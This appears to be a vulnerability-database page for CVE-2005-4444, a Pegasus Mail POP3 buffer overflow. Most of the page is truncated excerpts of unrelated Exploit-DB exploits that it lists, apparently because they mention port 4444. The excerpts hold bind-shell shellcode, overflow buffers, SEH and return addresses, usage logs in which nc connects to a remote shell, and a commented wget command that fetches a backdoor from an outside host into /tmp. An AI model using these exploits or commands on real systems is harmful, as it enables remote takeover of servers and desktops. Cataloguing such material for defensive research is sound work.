CVE-2005-4444
Published: 2005-12-21
Priority: P4 · 25 · medium
CVSS 2.0: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
EPSS: 3.16% (86.4th percentile)

Stack-based buffer overflow in the trace message functionality in Pegasus Mail 4.21a through 4.21c and 4.30PB1 allows remote attackers to execute arbitrary code via a long POP3 reply.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| david_harris | pegasus_mail | — | — |
| david_harris | pegasus_mail | — | — |
| david_harris | pegasus_mail | — | — |
| david_harris | pegasus_mail | — | — |
No detection rules found.
Exploit-DB: KNet Web Server 1.04b - Remote Buffer Overflow (SEH)
exploitdb · 2013-03-29 · CVE-2005-0575
---
#!/usr/bin/ruby
# Exploit Title: KNet Web Server Buffer Overflow SEH
# Date: 2013-03-27
# Exploit Author: Myo Soe, http://yehg.net/
# Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html
# Version: KNet 1.04b
# Tested on: Windows 7
require 'net/http'
require 'uri'
require 'socket'
############################################
# bind port 4444
sc_bind =
"\xbd\x0e\x27\x05\xab\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" +
"\xb1\x56\x83\xc2\x04\x31\x6a\x0f\x03\x6a\x01\xc5\xf0\x57" +
"\xf5\x80\xfb\xa7\x05\xf3\x72\x42\x34\x21\xe0\x06\x64\xf5" +
"\x62\x4a\x84\x7e\x26\x7f\x1f\xf2\xef\x70\xa8\xb9\xc9\xbf" +
"\x29\x0c\xd6\x6c\xe9\x0e\xaa\x6e\x3d\xf1\x93\xa0\x30\xf0" +
"\xd4\xdd\xba\xa0\x8d\xaa\x68\x55\xb9\xef\xb0\x54\x6d\
Exploit-DB: Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow
exploitdb · 2006-01-16 · CVE-2005-3116
---
/*
DESCRIPTION
Veritas NetBackup Stack Overflow (tcp/13701)
"Volume Manager Daemon" Module
Advisories
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336
http://www.frsirt.com/english/advisories/2005/2349
USAGE
C:\NetBackup>nb 192.168.0.2 4444 192.168.0.200 0
Veritas NetBackup v4/v5 "Volume Manager Daemon" Stack Overflow.
Sending first buffer.
Sending second buffer.
C:\NetBackup>nc 192.168.0.200 4444
Microsoft Windows 2000 [versie 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
INFORMATION
I wrote this just for educational purposes :).
Because the buffer is only very small, I had to write small shellcode.
The code is less than 100 bytes, and there are 6 bytes left.
Exploit-DB: BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack Overflow (SEH)
exploitdb · 2006-01-07 · CVE-2005-4085
---
#!perl
#
# "WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit
#
# Author: FistFucker (aka FistFuXXer)
# e-Mail: [email protected]
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
#
# CVE info:
# CAN-2005-4085
#
use IO::Socket;
#
# destination IP address
#
$ip = '127.0.0.1';
#
# destination TCP port
#
$port = 80;
#
# SE handler. 0x00, 0x0a, 0x0d free
#
$seh = reverse( "\x01\x03\x12\x40" ); # POP/POP/RET
# PAVDLL.01031240
#
# JMP SHORT to shellcode. 0x00, 0x0a, 0x0d free
#
$jmp = "\x90\x90\xeb\x32"; # [NOP][NOP][JMP|JMP]
#
# 0x00, 0x0a, 0x0d free shellcode
#
# win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
#
$sc = "\x31\xc9\x83\x
Exploit-DB: Microsoft Outlook Express - NNTP Buffer Overflow (MS05-030)
exploitdb · 2005-06-24 · CVE-2005-1213
---
#include
#include
#include
#include
#pragma comment(lib,"ws2_32")
/* win32_bind - EXITFUNC=process LPORT=4444 Size=344
Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x96"
"\x27\xc8\x3e\x83\xeb\xfc\xe2\xf4\x6a\x4d\x23\x73\x7e\xde\x37\xc1"
"\x69\x47\x43\x52\xb2\x03\x43\x7b\xaa\xac\xb4\x3b\xee\x26\x27\xb5"
"\xd9\x3f\x43\x61\xb6\x26\x23\x77\x1d\x13\x43\x3f\x78\x16\x08\xa7"
"\x3a\xa3\x08\x4a\x91\xe6\x02\x33\x97\xe5\x23\xca\xad\x73\xec\x16"
"\xe3\xc2\x43\x61\xb2\x26\x23\x58\x1d\x2b\x83\xb5\xc9\x3b\xc9\xd5"
"\x95\x0b\x43\xb7\xfa\x03\xd4\x5f\x55\x16\x13\x5a\x1d\x64\xf8\xb5"
"\xd6\x2b\x43\x4e\x8a\x8a\x43\x7e\x9e\x79\xa0\xb0\xd8\x29\x24\x6e"
"\x69\x
Exploit-DB: PeerCast 0.1211 - Remote Format String
exploitdb · 2005-06-20 · CVE-2005-1806
---
/*
\ PeerCast >]
\
/ by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]
\
/ uKt researcherz [ http://unl0ck.org ]
\
/ greetz goes to: uKt researcherz.
\
/
\ - smallest code - better code!!!
/
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//*******************************************
#define doit( b0, b1, b2, b3, addr ) { \
b0 = (addr >> 24) & 0xff; \
b1 = (addr >> 16) & 0xff; \
b2 = (addr >> 8) & 0xff; \
b3 = (addr ) & 0xff; \
}
//*******************************************
//****************************************************************
char shellcode[] = // binds 4444 port
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\
Exploit-DB: Webhints 1.03 - Remote Command Execution (Perl) (1)
exploitdb · 2005-06-11 · CVE-2005-1950
---
# This exploit uses a backdoor that isn't located on this server.
# $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
# change for your own needs. /str0ke
#!/usr/bin/perl
######################################################################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m #
######################################################################################
# EXPLOIT FOR: WebHints Remote C0mmand Execution Vuln #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v) #
#Email: [email protected] #
# #
#This Xpl Run a backdo0r in Server With 4444 Port. #
#Advisory: http://www.securityfocus.com/archive/1/401940/30/0/threaded #
###################################
Exploit-DB: WebAPP 0.9.9.2.1 - Remote Command Execution (1)
exploitdb · 2005-05-20 · CVE-2005-1628
---
#!/usr/bin/perl
#################################################################
# T r a p - S e t U n d e r G r o u n D H a c k i n g T e a m #
#################################################################
# Remote C0mmand Executing Expl0it - For WebAPP CGI
#
#Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v );
#E-Mail : [email protected]
# [email protected]
#This xpl Open a Backdoor in 4444 Port with Nobody Access !!! All Of The *NIX OS that Have UnPatch
#apage.cgi is Vulnerable in this M0ment !!
#
#################################################################
# Gr33tz To ==> AlphaST.Com , Crouz.Com , Simorgh-ev.Com And MH_P0rtal , Oil_Krachack #
################################################################
Exploit-DB: GlobalScape Secure FTP Server 3.0 - Remote Buffer Overflow
exploitdb · 2005-05-01 · CVE-2005-1415
---
#!/usr/bin/python
###############################################
# GlobalScape Secure FTP Server Buffer Overflow
# Coded by [email protected]
# http://www.see-security.com
# http://www.hackingdefined.com/exploits/Globalscape30.pdf
###############################################
# EIP Overwrite
# root@[muts]# ./globalscape-3.0-ftp.py
#
# [+] Evil GlobalFTP 3.0 Secure Server Exploit
# [+] Coded by mati [at] see-security [dot] com
# [+] 220 GlobalSCAPE Secure FTP Server (v. 3.0) * UNREGISTERED COPY *
#
# [+] Sending Username
# [+] Sending Password
# [+] Sending evil buffer
# [+] Connect to port 4444 on victim Machine!
#
# root@[muts]# nc -v 192.168.1.153 4444
# [192.168.1.153] 4444 (?) open
# Microsoft Windows 2000 [Version
Exploit-DB: Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)
exploitdb · 2005-04-29 · CVE-2005-0634
---
/*
\ golden ftp 2.52.0.0 remote r00t exploit
/
\ remote r00t exploit binds 4444 port on remote machine.
/ tested on: winxp sp0 rus
\
/ simple stack overflow in golden ftpd.
\ if retaddr isn't right, ftpd will crash, and admin will be in big shit
/ 'coz ftpd won't start later ;)
\
/ code to be executed, admin must restart or shutdown ftpd... then ftpd will execute eviLDuDe'Z c0de )
\
/ gr33tz: choix, nekd0, xtix, crash-x, coki, rave, antiq, xoce, shi, 'em, lp, spekterX, edisan, c0wboy
\ ilja, esDee, blackhatz.inf0, sk3w
/ p.s }:+ EvILduDe
\ (c) uKt research '04/'05
*/
#include
#include
#include
#include
#include
#define RETADDR 0x77F510B0
char shellcode[]= // binds 4444 port
"\xd9\xEE\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x7
Exploit-DB: Golden FTP Server Pro 2.52 - Remote Buffer Overflow (2)
exploitdb · 2005-04-29 · CVE-2005-0634
---
/*
Golden FTP Server Pro remote stack BOF exploit
author : c0d3r "kaveh razavi" [email protected] [email protected]
risk : highly critical
vender status : no patch released , all targets are vuln
package : golden-ftp-server-pro 2.5.0.0 and prior
advisory : http://secunia.com/advisories/15156/
vender address : www.goldenftpserver.com
timeline :
28 Apr 2005 : Public Disclosure
29 Apr 2005 : IHS exploit released , winxpsp1 & winxpsp2 target
after running the exploit u need to restart the server after that
the server will be closed automatically then u will have a shell
on port 4444 . if u want to erase the crap just clean the GFTPpro.log
manually as mentioned in the advisory .
workaround : upgrade to newer version or use anothe
Exploit-DB: Golden FTP Server Pro 2.52 - Remote Buffer Overflow (1)
exploitdb · 2005-04-29 · CVE-2005-0634
---
/*
*
* Golden FTP Server Pro Remote Buffer Overflow Exploit
* Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: [email protected]
* Credit to kozan and metasploit
* Usage:exploit
*
*/
/*
*
* Vulnerable Versions:
* Golden FTP Server Pro v2.52
*
* Exploit:
* Run the exploit against the server. Afterward, right
* click on the Golden FTP Server Pro icon in the Windows tray and click
* Statistic.
* It will open bind shell on port 4444
*
*/
#include
#include
#pragma comment(lib, "ws2_32.lib")
char userreq[] =
"USER "
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Exploit-DB: NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow
exploitdb · 2005-04-26 · CVE-2005-1323
---
#
# Net-ftpd 4.2.2 user autentication b0f exploit (0day)
# coded by Sergio 'shadown' Alvarez
#
import struct
import socket
import sys
import time
class warftpd:
def __init__(self, host, port):
self.host = host
self.port = port
self.bsize = 512
self.ebpaddr = 0xcacacaca
self.retaddr = 0xdeadbeef
self.sctype = 'findskt'
self.scport = None
def setebpaddr(self, addr):
self.ebpaddr = addr
def setretaddr(self, addr):
self.retaddr = addr
def setbsize(self, size):
self.bsize = size
def setsctype(self, type):
self.sctype = type
def setscport(self, port):
self.scport = port
def genbuffer(self):
##
# Alpha port bind 4444, thanx metasploit
##
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
sc += "\x49\x49\
Exploit-DB: Golden FTP Server 2.02b - Remote Buffer Overflow
exploitdb · 2005-01-22 · CVE-2005-0566
---
#!/usr/bin/perl -w
# Barabas - www.whitehat.co.il -
# cheers to muts and all peeps at WH.
# XPSP2 goldenftpserver sploit - bind 4444
use strict;
use Net::FTP;
my $payload="\x41"x260;
$payload .="\x65\x82\xa5\x7c";#jmpesp
$payload .="\x90"x32;#not really necessary...blah
# win32_bind - EXITFUNC=seh LPORT=4444 Size=321 Encoder=None http://metasploit.com
$payload .="\xfc\x6a\xeb\x4f\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\xe3".
"\x30\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1".
"\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe3\x8b\x5f\x24\x01".
"\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24".
"\x1c\x61\xc3\x31\xc0\x64\x8b\x40\x30\x
Exploit-DB: Apple iTunes - Playlist Parsing Local Buffer Overflow
exploitdb · 2005-01-16 · CVE-2005-0043
---
/*
* PoC for iTunes on OS X 10.3.7
* -( [email protected] )-
*
* Generates a .pls file, when loaded in iTunes it
* binds a shell to port 4444.
* Shellcode contains no \x00 or \x0a's.
*
* sample output:
*
* -[nemo@gir:~]$ ./fm-eyetewnz foo.pls
* -( fm-eyetewnz )-
* -( [email protected] )-
* Creating file: foo.pls.
* Bindshell on port: 4444
* -[nemo@gir:~]$ open foo.pls
* -[nemo@gir:~]$ nc localhost 4444
* id
* uid=501(nemo) gid=501(nemo) groups=501(nemo)
*
* Thanks to andrewg, mercy and core.
* Greetings to pulltheplug and felinemenace.
*
* -( need a challenge? )-
* -( http://pulltheplug.org )-
*/
#include
#include
#define BUFSIZE 1598 + 4
char shellcode[] = /* large ugly shellcode generated by http://metasploit.com */
"
No writeups or analysis indexed.
References:
- http://secunia.com/advisories/17992
- http://secunia.com/secunia_research/2005-61/advisory/
- http://securitytracker.com/id?1015385
- http://www.osvdb.org/21842
- http://www.pmail.com/newsflash.htm#secunia
- http://www.securityfocus.com/archive/1/419908/100/0/threaded
- http://www.securityfocus.com/bid/15973
- http://www.vupen.com/english/advisories/2005/3004